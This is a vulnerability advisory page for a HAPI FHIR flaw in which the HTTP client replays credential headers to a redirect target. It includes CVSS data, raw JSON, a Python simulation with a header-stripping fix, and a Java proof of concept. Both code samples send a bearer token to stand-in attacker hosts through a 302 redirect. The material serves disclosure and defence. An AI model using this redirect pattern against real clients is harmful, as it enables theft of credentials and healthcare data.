Security Vulnerability Report
CVE-2026-33180 CVSS 7.5 HIGH

Published: 2026-03-20 23:16:45
Last Modified: 2026-04-28 21:13:28

Description

HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.0, when headers are set on an HTTP request, the internal HTTP client sends them to the host in the initial URL and, if it has been asked to follow redirects and a 30X response is returned, also to the host named in the URL of the Location: response header. Replaying the same set of headers to a subsequent host is a problem because these headers often carry privacy-sensitive information, or credentials that would let the second host impersonate the client's request. This issue has been patched in release 6.9.0. No known workarounds are available.
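The redirect behaviour described above, simulated in an added example (this is not code from the page or from the HAPI FHIR project): a minimal redirect-following client is run against a constructed in-memory "network" in which the trusted host answers 302 with a Location pointing at an attacker host. With header stripping disabled the attacker endpoint receives the Authorization header; with the check enabled, credential-bearing headers (Authorization, Proxy-Authorization, Cookie) are dropped whenever the redirect target's scheme, host or port differs from the current URL, while a same-origin relative redirect keeps them. The host names, the bearer token and the `follow`/`headers_for_redirect` helpers are assumptions made for the example.

```python
from urllib.parse import urljoin, urlsplit

# Headers that carry credentials or session state. A client must not replay
# them to a different origin after following a 30x redirect.
SENSITIVE_HEADERS = {"authorization", "proxy-authorization", "cookie"}

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def _origin(url: str):
    """(scheme, host, port) triple; default ports are normalised so that
    https://h/ and https://h:443/ compare equal."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme.lower() == "https" else 80)
    return (u.scheme.lower(), (u.hostname or "").lower(), port)


def same_origin(url_a: str, url_b: str) -> bool:
    return _origin(url_a) == _origin(url_b)


def headers_for_redirect(current_url: str, next_url: str, headers: dict) -> dict:
    """Headers to send to next_url. Credentials survive only a same-origin hop;
    an https -> http downgrade on the same host also counts as cross-origin."""
    if same_origin(current_url, next_url):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in SENSITIVE_HEADERS}


def follow(transport, url: str, headers: dict, strip_on_cross_origin: bool = True,
           max_redirects: int = 5):
    """Minimal redirect-following client (assumed helper, not a HAPI FHIR API).

    transport(url, headers) -> (status, response_headers, body) stands in for the
    real socket layer so the example runs offline. Returns (final_url, body, log)
    where log lists (url, headers actually sent) for every hop.
    """
    log = []
    current, sent = url, dict(headers)
    for _ in range(max_redirects + 1):
        status, resp_headers, body = transport(current, sent)
        log.append((current, dict(sent)))
        location = resp_headers.get("Location")
        if status not in REDIRECT_STATUSES or location is None:
            return current, body, log
        next_url = urljoin(current, location)  # a relative Location resolves against current
        if strip_on_cross_origin:
            sent = headers_for_redirect(current, next_url, sent)
        current = next_url
    raise RuntimeError("too many redirects")


class FakeNetwork:
    """Constructed two-host network: a trusted FHIR server that (because it is
    compromised, misconfigured, or has a redirect injected) bounces the client
    to an attacker host that records every header it receives."""

    TRUSTED = "trusted-fhir-server.example"   # assumed host name
    ATTACKER = "attacker.example"             # assumed host name

    def __init__(self):
        self.attacker_saw = []

    def __call__(self, url, headers):
        host = urlsplit(url).hostname
        if host == self.TRUSTED:
            return 302, {"Location": f"http://{self.ATTACKER}/collect"}, b""
        if host == self.ATTACKER:
            self.attacker_saw.append(dict(headers))
            return 200, {}, b'{"resourceType":"OperationOutcome"}'
        return 404, {}, b""


def leaked_headers(strip_on_cross_origin: bool) -> dict:
    """Run one Patient read through the fake network and return the headers
    the attacker host received."""
    net = FakeNetwork()
    request_headers = {
        "Authorization": "Bearer sensitive-token-123",   # constructed token
        "Accept": "application/fhir+json",
    }
    follow(net, f"https://{FakeNetwork.TRUSTED}/Patient/example", request_headers,
           strip_on_cross_origin=strip_on_cross_origin)
    return net.attacker_saw[0]


if __name__ == "__main__":
    print("vulnerable client, attacker received:", leaked_headers(False))
    print("hardened client, attacker received:  ", leaked_headers(True))
```

The origin comparison is the same policy mainstream clients apply (Python requests drops Authorization when the host changes; curl needs --location-trusted before it will forward credentials to another host). Comparing scheme and port as well as host matters: a redirect from https to http on the same host would otherwise replay the bearer token in cleartext.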

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

HAPI FHIR < 6.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// Conceptual PoC for the header-leak scenario described above. The advisory
// cited under References is filed against the hapifhir/org.hl7.fhir.core
// repository; this snippet illustrates the pattern with HAPI FHIR's generic
// REST client and is an illustration, not a reproduction against a specific
// vulnerable class.
//
// 1. The attacker runs a server that logs every request header it receives.
//    The trusted server (or an attacker able to inject a redirect) answers:
//      HTTP/1.1 302 Found
//      Location: http://attacker-controlled-server.com/collect
//
// 2. The victim uses a vulnerable client (< 6.9.0) that follows redirects.
import java.io.IOException;

import ca.uhn.fhir.context.FhirContext;
import ca.uhn.fhir.rest.client.api.IClientInterceptor;
import ca.uhn.fhir.rest.client.api.IGenericClient;
import ca.uhn.fhir.rest.client.api.IHttpRequest;
import ca.uhn.fhir.rest.client.api.IHttpResponse;

public class HapiClient {
    public static void main(String[] args) {
        FhirContext ctx = FhirContext.forR4();

        // The scenario assumes the underlying HTTP client follows redirects.
        IGenericClient client = ctx.newRestfulGenericClient("https://trusted-hapi-server.com");

        // Attach a sensitive header (here a bearer token) to every outgoing request.
        client.registerInterceptor(new IClientInterceptor() {
            @Override
            public void interceptRequest(IHttpRequest theRequest) {
                theRequest.addHeader("Authorization", "Bearer sensitive-token-123");
            }

            @Override
            public void interceptResponse(IHttpResponse theResponse) throws IOException {
                // Nothing to do for this PoC.
            }
        });

        // Trigger a request. If the trusted server answers with the 302 above, a
        // vulnerable client replays "Authorization: Bearer sensitive-token-123"
        // to attacker-controlled-server.com.
        client.read().resource("Patient").withId("example").execute();
    }
}

References

https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-p7m9-v2cm-2h7m (GitHub Security Advisory; weakness classified as CWE-200)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33180",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T23:16:45.020",
    "lastModified": "2026-04-28T21:13:28.120",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.0, when setting headers in HTTP requests, the internal HTTP client sends headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the Location: response header value. Sending the same set of headers to subsequent hosts is a problem as this header often contains privacy sensitive information or data that could allow others to impersonate the client's request. This issue has been patched in release 6.9.0. No known workarounds are available."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-200" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-p7m9-v2cm-2h7m",
        "source": "[email protected]"
      }
    ]
  }
}